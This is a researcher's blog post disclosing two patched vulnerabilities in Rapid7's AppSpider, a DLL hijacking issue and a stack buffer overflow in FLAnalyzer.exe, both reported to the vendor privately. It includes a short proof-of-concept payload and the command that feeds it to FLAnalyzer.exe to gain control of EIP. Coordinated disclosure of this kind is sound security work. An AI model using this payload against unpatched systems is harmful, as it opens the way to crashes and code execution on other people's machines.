May 16, 2017 Karn Ganeshen

Rapid7 AppSpider vulnerabilities

Recently, I checked out Rapid7’s AppSpider Web Application Testing software. It is a Windows based application, and the demo version is available for anyone to play with.

Web Application Security Testing with AppSpider | Rapid7
https://www.rapid7.com/products/appspider/

ABOUT

I found 2 vulnerabilities in AppSpider – DLL Pre-loading & Buffer overflow – which I then reported privately to R7 team. The folks at Rapid7 confirmed my reports, and released the new versions shortly after.

The Release Announcement is available here – https://community.rapid7.com/docs/DOC-3631

  • Updated nginx.exe to utilize Microsoft Security Advisory on remote code execution. Windows 7, Windows Server 2008 R2, Windows Vista and Windows Server 2008: KB2533623 must be installed on the target platform. Resolves – CVE-2017-5236
  • Resolved buffer over flow crash in the AppSpider command line tool for inputs.  Resolves – CVE-2017-5240

Rapid7 thanks Karn Ganeshen for privately reporting the CVE issues. – w00t w00t!

VULNERABILITY OVERVIEW
A. Rapid 7 AppSpider Insecure Library Load (DLL Hijacking) Vulnerability – CVE-2017-5236

Shell does not disconnect after set up completes.

B. Rapid7 AppSpider Stack Buffer Overflow Vulnerability – CVE-2017-5240

Vulnerable component
FLAnalyzer.exe

Payload
“A”*4040 + “B”*4 + “C”*5956

PoC -> EIP control
C:\Program Files\Rapid7\AppSpider6\ScanEngine> FLAnalyzer.exe <payload>

+++++

Tagged: , , , , ,

Leave a Reply

Your email address will not be published. Required fields are marked *